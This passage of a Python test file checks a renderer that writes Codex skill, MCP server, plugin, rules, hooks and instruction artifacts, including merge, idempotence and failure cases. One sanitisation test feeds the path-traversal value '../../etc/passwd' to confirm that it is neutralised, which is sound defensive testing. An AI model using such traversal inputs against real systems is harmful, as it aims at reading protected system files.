json.loads((skill_dir / "skill.json").read_text()) + assert content["native_config"] == {"priority": "high"} + + def test_skill_no_native_ref_produces_warning(self, workspace: Path) -> None: + plan = _plan( + bindings=(ProviderArtifactBinding(provider="codex"),), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.warnings) >= 1 + assert any("no native_ref" in w or "no recognised" in w.lower() for w in result.warnings) + + +# --------------------------------------------------------------------------- +# MCP server binding +# --------------------------------------------------------------------------- + + +class TestMCPBinding: + def test_sse_mcp_server(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="github-mcp", + transport_type="sse", + native_config={"url": "http://localhost:8080/sse"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + assert "mcpServers" in result.mcp_fragment + mcp = result.mcp_fragment["mcpServers"] + assert "github-mcp" in mcp + assert mcp["github-mcp"]["type"] == "sse" + assert mcp["github-mcp"]["url"] == "http://localhost:8080/sse" + + def test_http_mcp_server(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="my-server", + transport_type="http", + native_config={"url": "https://api.example.com/mcp"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + mcp = result.mcp_fragment["mcpServers"] + assert mcp["my-server"]["type"] == "http" + assert mcp["my-server"]["url"] == "https://api.example.com/mcp" + + def test_stdio_mcp_server(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="local-mcp", + transport_type="stdio", + native_config={ + "command": "/usr/bin/my-mcp-server", + "args": "--port 9090 --verbose", + "env_API_KEY": "placeholder", + }, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + mcp = result.mcp_fragment["mcpServers"] + assert "local-mcp" in mcp + assert mcp["local-mcp"]["type"] == "stdio" + assert mcp["local-mcp"]["command"] == "/usr/bin/my-mcp-server" + assert mcp["local-mcp"]["args"] == ["--port", "9090", "--verbose"] + assert mcp["local-mcp"]["env"] == {"API_KEY": "placeholder"} + + def test_sse_mcp_with_headers(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="authed-mcp", + transport_type="sse", + native_config={ + "url": "https://mcp.example.com/sse", + "header_Authorization": "Bearer tok", + "header_X-Org": "my-org", + }, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + mcp = result.mcp_fragment["mcpServers"] + assert mcp["authed-mcp"]["headers"] == { + "Authorization": "Bearer tok", + "X-Org": "my-org", + } + + def test_mcp_no_url_produces_warning(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="broken-mcp", + transport_type="sse", + native_config={}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + assert any("no 'url'" in w for w in result.warnings) + + def test_mcp_no_command_produces_warning(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="broken-stdio", + transport_type="stdio", + native_config={}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + assert any("no 'command'" in w for w in result.warnings) + + def test_mcp_fallback_name_when_no_native_ref(self, workspace: Path) -> None: + plan = _plan( + bundle_id="my-bundle", + bindings=( + ProviderArtifactBinding( + provider="codex", + transport_type="sse", + native_config={"url": "http://localhost:9090"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + mcp = result.mcp_fragment["mcpServers"] + assert "scc-my-bundle-mcp" in mcp + + +# --------------------------------------------------------------------------- +# Native integration binding +# --------------------------------------------------------------------------- + + +class TestNativeIntegrationBinding: + def test_plugin_bundle_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"plugin_bundle": "./codex/github-plugin"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + plugin_path = workspace / CODEX_PLUGIN_DIR / "plugin.json" + assert plugin_path.exists() + content = json.loads(plugin_path.read_text()) + assert content["source"] == "./codex/github-plugin" + assert content["provider"] == "codex" + assert content["bundle_id"] == "test-bundle" + assert content["managed_by"] == "scc" + assert plugin_path in result.rendered_paths + + def test_rules_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./codex/rules/github.rules"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + rules_path = workspace / CODEX_RULES_DIR / "github.rules.json" + assert rules_path.exists() + content = json.loads(rules_path.read_text()) + assert content["source"] == "./codex/rules/github.rules" + assert content["bundle_id"] == "test-bundle" + assert content["managed_by"] == "scc" + assert rules_path in result.rendered_paths + + def test_hooks_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./codex/github-hooks.json"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + hooks_path = workspace / CODEX_CONFIG_DIR / "hooks.json" + assert hooks_path.exists() + content = json.loads(hooks_path.read_text()) + assert "scc_managed" in content + assert "test-bundle" in content["scc_managed"] + assert content["scc_managed"]["test-bundle"]["source"] == "./codex/github-hooks.json" + assert content["scc_managed"]["test-bundle"]["managed_by"] == "scc" + assert hooks_path in result.rendered_paths + + def test_hooks_merge_preserves_existing(self, workspace: Path) -> None: + """Existing non-SCC content in hooks.json should be preserved.""" + codex_dir = workspace / CODEX_CONFIG_DIR + codex_dir.mkdir(parents=True, exist_ok=True) + hooks_path = codex_dir / "hooks.json" + existing = {"user_hook": {"command": "lint", "event": "pre-commit"}} + hooks_path.write_text(json.dumps(existing, indent=2) + "\n") + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./codex/hooks-src.json"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + content = json.loads(hooks_path.read_text()) + # User hook preserved + assert content["user_hook"]["command"] == "lint" + # SCC-managed section added + assert "scc_managed" in content + assert "test-bundle" in content["scc_managed"] + + def test_hooks_merge_corrupted_file_overwrites(self, workspace: Path) -> None: + """Corrupted hooks.json should be overwritten with warning.""" + codex_dir = workspace / CODEX_CONFIG_DIR + codex_dir.mkdir(parents=True, exist_ok=True) + hooks_path = codex_dir / "hooks.json" + hooks_path.write_text("not-valid-json!!!") + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./codex/hooks-src.json"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + assert any("Could not parse" in w for w in result.warnings) + content = json.loads(hooks_path.read_text()) + assert "scc_managed" in content + + def test_instructions_binding(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "./codex/AGENTS.team.md"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + instr_path = workspace / SCC_MANAGED_DIR / "instructions" / "AGENTS.team.json" + assert instr_path.exists() + content = json.loads(instr_path.read_text()) + assert content["source"] == "./codex/AGENTS.team.md" + assert content["provider"] == "codex" + assert content["managed_by"] == "scc" + assert instr_path in result.rendered_paths + + def test_combined_native_integration(self, workspace: Path) -> None: + """A single binding with plugin_bundle + rules + hooks + instructions.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={ + "plugin_bundle": "./codex/github-plugin", + "rules": "./codex/rules/github.rules", + "hooks": "./codex/hooks-src.json", + "instructions": "./codex/AGENTS.team.md", + }, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + # Plugin file + assert (workspace / CODEX_PLUGIN_DIR / "plugin.json").exists() + # Rules file + assert (workspace / CODEX_RULES_DIR / "github.rules.json").exists() + # Hooks file + assert (workspace / CODEX_CONFIG_DIR / "hooks.json").exists() + # Instructions file + assert (workspace / SCC_MANAGED_DIR / "instructions" / "AGENTS.team.json").exists() + # No warnings expected + assert result.warnings == () + + +# --------------------------------------------------------------------------- +# Mixed bundle +# --------------------------------------------------------------------------- + + +class TestMixedBundle: + def test_mixed_skill_mcp_native(self, workspace: Path) -> None: + """Bundle with skill, MCP server, and native integration.""" + plan = _plan( + bundle_id="github-dev", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/code-review", + ), + ProviderArtifactBinding( + provider="codex", + native_ref="github-mcp", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ProviderArtifactBinding( + provider="codex", + native_config={ + "plugin_bundle": "./codex/github-plugin", + "rules": "./codex/rules/github.rules", + }, + ), + ), + effective_artifacts=("code-review-skill", "github-mcp", "github-native"), + ) + result = render_codex_artifacts(plan, workspace) + + # Skill file under .agents/skills/ + skill_path = workspace / SKILLS_DIR / "skills_code-review" / "skill.json" + assert skill_path.exists() + + # MCP server in fragment + assert "github-mcp" in result.mcp_fragment.get("mcpServers", {}) + + # Plugin + rules + assert (workspace / CODEX_PLUGIN_DIR / "plugin.json").exists() + assert (workspace / CODEX_RULES_DIR / "github.rules.json").exists() + + # Audit file written + audit_file = workspace / CODEX_CONFIG_DIR / ".scc-mcp-github-dev.json" + assert audit_file.exists() + audit_content = json.loads(audit_file.read_text()) + assert "mcpServers" in audit_content + + # No warnings + assert result.warnings == () + + +# --------------------------------------------------------------------------- +# MCP audit file +# --------------------------------------------------------------------------- + + +class TestMCPAuditFile: + def test_audit_file_written_when_fragment_nonempty(self, workspace: Path) -> None: + plan = _plan( + bundle_id="my-bundle", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="server", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + audit_path = workspace / CODEX_CONFIG_DIR / ".scc-mcp-my-bundle.json" + assert audit_path.exists() + assert audit_path in result.rendered_paths + + def test_no_audit_file_for_empty_fragment(self, workspace: Path) -> None: + plan = _plan( + bundle_id="empty-bundle", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/foo", + ), + ), + ) + render_codex_artifacts(plan, workspace) + + audit_path = workspace / CODEX_CONFIG_DIR / ".scc-mcp-empty-bundle.json" + assert not audit_path.exists() + + +# --------------------------------------------------------------------------- +# Idempotent rendering +# --------------------------------------------------------------------------- + + +class TestIdempotent: + def test_same_plan_produces_same_output(self, workspace: Path) -> None: + """Two renders of the same plan yield identical file content.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/review", + ), + ProviderArtifactBinding( + provider="codex", + native_ref="mcp-server", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./codex/rules/test.rules"}, + ), + ), + ) + result1 = render_codex_artifacts(plan, workspace) + result2 = render_codex_artifacts(plan, workspace) + + assert result1.mcp_fragment == result2.mcp_fragment + assert len(result1.rendered_paths) == len(result2.rendered_paths) + assert result1.warnings == result2.warnings + + # File contents are the same + for path in result1.rendered_paths: + assert path.exists() + + def test_overwrite_on_rerender(self, workspace: Path) -> None: + """Second render overwrites first — no duplicate files.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/my-skill", + ), + ), + ) + render_codex_artifacts(plan, workspace) + result2 = render_codex_artifacts(plan, workspace) + + # Only one skill dir exists + skill_parent = workspace / SKILLS_DIR + assert len(list(skill_parent.iterdir())) == 1 + assert len(result2.rendered_paths) == 1 + + +# --------------------------------------------------------------------------- +# Return type shape +# --------------------------------------------------------------------------- + + +class TestReturnType: + def test_result_is_renderer_result(self, workspace: Path) -> None: + result = render_codex_artifacts(_plan(), workspace) + assert isinstance(result, RendererResult) + + def test_rendered_paths_are_path_objects(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/x", + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + for p in result.rendered_paths: + assert isinstance(p, Path) + + def test_mcp_fragment_is_dict(self, workspace: Path) -> None: + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="mcp-srv", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + assert isinstance(result.mcp_fragment, dict) + assert "mcpServers" in result.mcp_fragment + + +# --------------------------------------------------------------------------- +# Failure path tests — fail-closed semantics +# --------------------------------------------------------------------------- + + +class TestSkillMaterializationFailure: + def test_read_only_workspace_raises_materialization_error(self, workspace: Path) -> None: + """Skill write to read-only dir raises MaterializationError.""" + skills = workspace / SKILLS_DIR + skills.mkdir(parents=True, exist_ok=True) + skills.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/blocked", + ), + ), + ) + with pytest.raises(MaterializationError) as exc_info: + render_codex_artifacts(plan, workspace) + err = exc_info.value + assert err.bundle_id == "test-bundle" + assert "skills/blocked" in err.artifact_name + + skills.chmod(0o755) + + +class TestPluginCreationFailure: + def test_plugin_write_failure_raises_materialization_error(self, workspace: Path) -> None: + """Plugin file write to read-only dir → MaterializationError.""" + plugin_dir = workspace / CODEX_PLUGIN_DIR + plugin_dir.mkdir(parents=True, exist_ok=True) + plugin_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"plugin_bundle": "./codex/plugin-src"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="plugin"): + render_codex_artifacts(plan, workspace) + + plugin_dir.chmod(0o755) + + +class TestRulesWriteFailure: + def test_rules_write_failure_raises_materialization_error(self, workspace: Path) -> None: + """Rules file write to read-only dir → MaterializationError.""" + rules_dir = workspace / CODEX_RULES_DIR + rules_dir.mkdir(parents=True, exist_ok=True) + rules_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./codex/rules/safety.rules"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="rules"): + render_codex_artifacts(plan, workspace) + + rules_dir.chmod(0o755) + + +class TestHooksWriteFailure: + def test_hooks_write_failure_raises_materialization_error(self, workspace: Path) -> None: + """hooks.json write to read-only dir → MaterializationError.""" + codex_dir = workspace / CODEX_CONFIG_DIR + codex_dir.mkdir(parents=True, exist_ok=True) + codex_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./codex/hooks-src.json"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="hooks"): + render_codex_artifacts(plan, workspace) + + codex_dir.chmod(0o755) + + def test_hooks_read_os_error_raises_materialization_error(self, workspace: Path) -> None: + """OSError reading existing hooks.json → MaterializationError (not warning).""" + codex_dir = workspace / CODEX_CONFIG_DIR + codex_dir.mkdir(parents=True, exist_ok=True) + hooks_path = codex_dir / "hooks.json" + # Create hooks.json as a directory to cause an OSError on read + hooks_path.mkdir() + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./codex/hooks-src.json"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="hooks"): + render_codex_artifacts(plan, workspace) + + hooks_path.rmdir() + + +class TestInstructionsWriteFailure: + def test_instructions_write_failure_raises_materialization_error(self, workspace: Path) -> None: + """instructions write to read-only dir → MaterializationError.""" + instr_dir = workspace / SCC_MANAGED_DIR / "instructions" + instr_dir.mkdir(parents=True, exist_ok=True) + instr_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "./codex/AGENTS.md"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="instructions"): + render_codex_artifacts(plan, workspace) + + instr_dir.chmod(0o755) + + +class TestMCPAuditWriteFailure: + def test_mcp_audit_file_write_failure_raises_materialization_error( + self, workspace: Path + ) -> None: + """MCP audit file write to read-only .codex/ → MaterializationError.""" + codex_dir = workspace / CODEX_CONFIG_DIR + codex_dir.mkdir(parents=True, exist_ok=True) + codex_dir.chmod(0o444) + + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="mcp-server", + transport_type="sse", + native_config={"url": "http://localhost:8080"}, + ), + ), + ) + with pytest.raises(MaterializationError, match="mcp_fragment"): + render_codex_artifacts(plan, workspace) + + codex_dir.chmod(0o755) + + +class TestRendererErrorHierarchy: + def test_materialization_error_is_renderer_error(self) -> None: + from scc_cli.core.errors import RendererError + + err = MaterializationError( + user_message="test", + bundle_id="b", + artifact_name="a", + target_path="/foo", + reason="bad", + ) + assert isinstance(err, RendererError) + assert err.exit_code == 4 + + def test_merge_conflict_error_is_renderer_error(self) -> None: + from scc_cli.core.errors import RendererError + + err = MergeConflictError( + user_message="test", + bundle_id="b", + target_path="/foo", + conflict_detail="dup", + ) + assert isinstance(err, RendererError) + + +# --------------------------------------------------------------------------- +# Internal helper: _render_skill_binding — direct coverage +# --------------------------------------------------------------------------- + + +class TestRenderSkillBindingDirect: + """Test _render_skill_binding directly to reach code paths unreachable + through the public API (the classifier routes bindings with no native_ref + to 'unknown', never calling _render_skill_binding).""" + + def test_null_native_ref_returns_warning(self, workspace: Path) -> None: + """Lines 113-117: early return with warning when native_ref is None.""" + binding = ProviderArtifactBinding(provider="codex", native_ref=None) + rendered, warnings = _render_skill_binding(binding, workspace, "b1") + assert rendered == [] + assert len(warnings) == 1 + assert "no native_ref" in warnings[0] + assert "b1" in warnings[0] + + def test_empty_string_native_ref_returns_warning(self, workspace: Path) -> None: + """Empty string is also falsy — same early return.""" + binding = ProviderArtifactBinding(provider="codex", native_ref="") + rendered, warnings = _render_skill_binding(binding, workspace, "b2") + assert rendered == [] + assert len(warnings) == 1 + + def test_normal_ref_creates_file(self, workspace: Path) -> None: + """Sanity: valid ref through the helper produces a metadata file.""" + binding = ProviderArtifactBinding(provider="codex", native_ref="skills/test") + rendered, warnings = _render_skill_binding(binding, workspace, "b3") + assert len(rendered) == 1 + assert rendered[0].name == "skill.json" + assert warnings == [] + + def test_path_sanitisation_dotdot(self, workspace: Path) -> None: + """Path traversal chars replaced in skill directory name.""" + binding = ProviderArtifactBinding(provider="codex", native_ref="../../etc/passwd") + rendered, warnings = _render_skill_binding(binding, workspace, "b4") + assert len(rendered) == 1 + # '..' replaced with '_', '/' replaced with '_' + dir_name = rendered[0].parent.name + assert ".." not in dir_name + assert "/" not in dir_name + + def test_path_sanitisation_backslash(self, workspace: Path) -> None: + """Backslash in native_ref is sanitised.""" + binding = ProviderArtifactBinding(provider="codex", native_ref="skills\\code-review") + rendered, warnings = _render_skill_binding(binding, workspace, "b5") + assert len(rendered) == 1 + dir_name = rendered[0].parent.name + assert "\\" not in dir_name + + +# --------------------------------------------------------------------------- +# Internal helper: _render_mcp_binding — edge cases +# --------------------------------------------------------------------------- + + +class TestRenderMCPBindingDirect: + """Test _render_mcp_binding directly for branch-closing coverage.""" + + def test_sse_with_url_no_headers(self, workspace: Path) -> None: + """SSE transport with url but zero header_* keys → no 'headers' key + in output. Closes the partial branch at line 181→180.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="clean-mcp", + transport_type="sse", + native_config={"url": "http://localhost:9090"}, + ) + config, warnings = _render_mcp_binding(binding, "b1") + assert warnings == [] + server = config["clean-mcp"] + assert "headers" not in server + assert server["url"] == "http://localhost:9090" + + def test_http_with_url_no_headers(self, workspace: Path) -> None: + """HTTP transport with url but zero header_* keys.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="http-mcp", + transport_type="http", + native_config={"url": "https://api.example.com"}, + ) + config, warnings = _render_mcp_binding(binding, "b2") + assert warnings == [] + assert "headers" not in config["http-mcp"] + + def test_unknown_transport_type(self, workspace: Path) -> None: + """Transport type not sse/http/stdio → no command/url/args parsed. + Closes the partial branch at line 186→208.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="exotic-mcp", + transport_type="grpc", + native_config={"endpoint": "localhost:50051"}, + ) + config, warnings = _render_mcp_binding(binding, "b3") + assert warnings == [] + server = config["exotic-mcp"] + assert server["type"] == "grpc" + # No url/command/args parsing for unknown transport + assert "url" not in server + assert "command" not in server + + def test_stdio_with_command_no_env_keys(self, workspace: Path) -> None: + """stdio transport with command but no env_* keys → no 'env' key. + Closes the partial branch at line 203→202.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="simple-stdio", + transport_type="stdio", + native_config={"command": "/usr/bin/server"}, + ) + config, warnings = _render_mcp_binding(binding, "b4") + assert warnings == [] + server = config["simple-stdio"] + assert server["command"] == "/usr/bin/server" + assert "env" not in server + assert "args" not in server + + def test_stdio_with_non_string_args(self, workspace: Path) -> None: + """Non-string args value → goes through [str(args_raw)] branch.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="int-args-mcp", + transport_type="stdio", + native_config={"command": "/usr/bin/srv", "args": 42}, # type: ignore[dict-item] + ) + config, warnings = _render_mcp_binding(binding, "b5") + server = config["int-args-mcp"] + assert server["args"] == ["42"] + + def test_stdio_no_args_key(self, workspace: Path) -> None: + """No 'args' key in config → args_raw is None, no 'args' in output.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="no-args-mcp", + transport_type="stdio", + native_config={"command": "/bin/tool"}, + ) + config, warnings = _render_mcp_binding(binding, "b6") + assert "args" not in config["no-args-mcp"] + + def test_multiple_env_keys_collected(self, workspace: Path) -> None: + """Multiple env_* keys are all collected into env dict.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="multi-env", + transport_type="stdio", + native_config={ + "command": "/bin/tool", + "env_FOO": "bar", + "env_BAZ": "qux", + }, + ) + config, warnings = _render_mcp_binding(binding, "b7") + server = config["multi-env"] + assert server["env"] == {"FOO": "bar", "BAZ": "qux"} + + def test_sse_with_extra_non_header_keys_no_headers(self, workspace: Path) -> None: + """SSE with leftover config keys (not header_*) → loop body for + header collection executes but no keys match. + Closes partial branch 181→180.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="extra-mcp", + transport_type="sse", + native_config={"url": "http://localhost", "custom_key": "val"}, + ) + config, warnings = _render_mcp_binding(binding, "b8") + server = config["extra-mcp"] + assert "headers" not in server + assert server["url"] == "http://localhost" + + def test_stdio_with_extra_non_env_keys_no_env(self, workspace: Path) -> None: + """stdio with leftover config keys (not env_*) → loop body for + env collection executes but no keys match. + Closes partial branch 203→202.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="extra-stdio", + transport_type="stdio", + native_config={"command": "/bin/tool", "custom_key": "val"}, + ) + config, warnings = _render_mcp_binding(binding, "b9") + server = config["extra-stdio"] + assert "env" not in server + assert server["command"] == "/bin/tool" + + +# --------------------------------------------------------------------------- +# Internal helper: _classify_binding — unit tests +# --------------------------------------------------------------------------- + + +class TestClassifyBinding: + """Unit tests for _classify_binding to verify classification dispatch.""" + + def test_native_integration_keys_wins(self) -> None: + """Binding with integration keys in native_config → 'native'.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="something", + transport_type="sse", + native_config={"plugin_bundle": "./plugin"}, + ) + assert _classify_binding(binding) == "native" + + def test_transport_type_without_integration_keys(self) -> None: + """Binding with transport_type but no integration keys → 'mcp'.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="server", + transport_type="stdio", + native_config={"command": "/bin/x"}, + ) + assert _classify_binding(binding) == "mcp" + + def test_native_ref_only(self) -> None: + """Binding with native_ref only → 'skill'.""" + binding = ProviderArtifactBinding( + provider="codex", + native_ref="skills/my-skill", + ) + assert _classify_binding(binding) == "skill" + + def test_empty_binding(self) -> None: + """Binding with nothing → 'unknown'.""" + binding = ProviderArtifactBinding(provider="codex") + assert _classify_binding(binding) == "unknown" + + def test_rules_key_classifies_as_native(self) -> None: + """The 'rules' key in native_config → 'native'.""" + binding = ProviderArtifactBinding( + provider="codex", + native_config={"rules": "./rules/safety.rules"}, + ) + assert _classify_binding(binding) == "native" + + def test_hooks_key_classifies_as_native(self) -> None: + """The 'hooks' key → 'native'.""" + binding = ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./hooks.json"}, + ) + assert _classify_binding(binding) == "native" + + def test_instructions_key_classifies_as_native(self) -> None: + """The 'instructions' key → 'native'.""" + binding = ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "./AGENTS.md"}, + ) + assert _classify_binding(binding) == "native" + + def test_unknown_config_keys_with_transport_still_mcp(self) -> None: + """Non-integration config keys + transport_type → 'mcp', not 'native'.""" + binding = ProviderArtifactBinding( + provider="codex", + transport_type="sse", + native_config={"url": "http://localhost:8080", "custom": "val"}, + ) + assert _classify_binding(binding) == "mcp" + + def test_integration_key_trumps_transport(self) -> None: + """Integration key present + transport_type set → 'native' wins.""" + binding = ProviderArtifactBinding( + provider="codex", + transport_type="sse", + native_config={"hooks": "./hooks.json", "url": "http://localhost"}, + ) + assert _classify_binding(binding) == "native" + + +# --------------------------------------------------------------------------- +# Asymmetry: Claude-only native_integration → skipped for Codex +# --------------------------------------------------------------------------- + + +class TestProviderAsymmetry: + """Plan item 7: bundle with Claude-only native_integration → skipped + for Codex with clear reason.""" + + def test_claude_only_binding_skipped_in_codex_plan(self, workspace: Path) -> None: + """A binding with provider='claude' in a Codex plan is skipped.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"plugin_bundle": "./claude/plugin"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "claude" in result.warnings[0] + assert "skipping" in result.warnings[0].lower() + assert result.rendered_paths == () + + def test_mixed_claude_and_codex_bindings(self, workspace: Path) -> None: + """Claude bindings are skipped; Codex bindings are rendered.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="claude", + native_config={"plugin_bundle": "./claude/plugin"}, + ), + ProviderArtifactBinding( + provider="codex", + native_ref="skills/code-review", + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + # Claude binding skipped with warning + assert any("claude" in w for w in result.warnings) + # Codex binding rendered + assert len(result.rendered_paths) == 1 + assert "skill.json" in str(result.rendered_paths[0]) + + def test_arbitrary_provider_binding_skipped(self, workspace: Path) -> None: + """Any non-codex provider binding is skipped, not just 'claude'.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="gemini", + native_ref="skills/gemini-skill", + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + assert len(result.warnings) == 1 + assert "gemini" in result.warnings[0] + + def test_codex_plan_wrong_provider_skips_all(self, workspace: Path) -> None: + """Plan with provider='claude' → everything skipped, no rendering.""" + plan = _plan( + provider="claude", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_ref="skills/foo", + ), + ), + effective_artifacts=("foo-skill",), + ) + result = render_codex_artifacts(plan, workspace) + assert "nothing rendered" in result.warnings[0] + assert result.skipped_artifacts == ("foo-skill",) + assert result.rendered_paths == () + + +# --------------------------------------------------------------------------- +# AGENTS.md / instructions rendering (plan item 6) +# --------------------------------------------------------------------------- + + +class TestAGENTSMdRendering: + """Plan item 6: native_integration with Codex instructions binding + → AGENTS.md section (via .codex/.scc-managed/instructions/).""" + + def test_instructions_creates_metadata_under_scc_managed(self, workspace: Path) -> None: + """Instructions binding writes to .codex/.scc-managed/instructions/.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "team-guidelines/AGENTS.md"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + + instr_path = workspace / SCC_MANAGED_DIR / INSTRUCTIONS_SUBDIR / "AGENTS.json" + assert instr_path.exists() + content = json.loads(instr_path.read_text()) + assert content["source"] == "team-guidelines/AGENTS.md" + assert content["provider"] == "codex" + assert content["bundle_id"] == "test-bundle" + assert content["managed_by"] == "scc" + assert instr_path in result.rendered_paths + + def test_instructions_filename_derived_from_stem(self, workspace: Path) -> None: + """The output filename stem matches the source path's stem.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "docs/coding-standards.md"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + expected = workspace / SCC_MANAGED_DIR / INSTRUCTIONS_SUBDIR / "coding-standards.json" + assert expected.exists() + + def test_multiple_instructions_bindings(self, workspace: Path) -> None: + """Two instruction bindings produce two metadata files.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "docs/AGENTS.md"}, + ), + ProviderArtifactBinding( + provider="codex", + native_config={"instructions": "docs/STYLE.md"}, + ), + ), + ) + result = render_codex_artifacts(plan, workspace) + instr_dir = workspace / SCC_MANAGED_DIR / INSTRUCTIONS_SUBDIR + files = sorted(f.name for f in instr_dir.iterdir()) + assert "AGENTS.json" in files + assert "STYLE.json" in files + assert len(result.rendered_paths) == 2 + + +# --------------------------------------------------------------------------- +# Merge strategy (plan item 8): SCC-managed sections marked; non-SCC preserved +# --------------------------------------------------------------------------- + + +class TestMergeStrategy: + """Plan item 8: SCC-managed sections are clearly marked and non-SCC + content is preserved during merge.""" + + def test_hooks_scc_managed_key_isolates_scc_content(self, workspace: Path) -> None: + """SCC content goes under 'scc_managed' key, not at top level.""" + plan = _plan( + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./hooks-src.json"}, + ), + ), + ) + render_codex_artifacts(plan, workspace) + + hooks = json.loads((workspace / CODEX_CONFIG_DIR / "hooks.json").read_text()) + # SCC content is inside 'scc_managed', not scattered at root + assert "scc_managed" in hooks + # Only 'scc_managed' key exists (nothing else at top level) + assert set(hooks.keys()) == {"scc_managed"} + + def test_hooks_multi_bundle_merge(self, workspace: Path) -> None: + """Two bundles rendering hooks → both appear under scc_managed.""" + plan1 = _plan( + bundle_id="bundle-a", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./hooks-a.json"}, + ), + ), + ) + plan2 = _plan( + bundle_id="bundle-b", + bindings=( + ProviderArtifactBinding( + provider="codex", + native_config={"hooks": "./hooks-b.json"}, + ), + ), + ) + render_codex_artifacts(plan1, workspace) + render_codex_artifacts(plan2, workspace) + + hooks = json.loads((workspace / 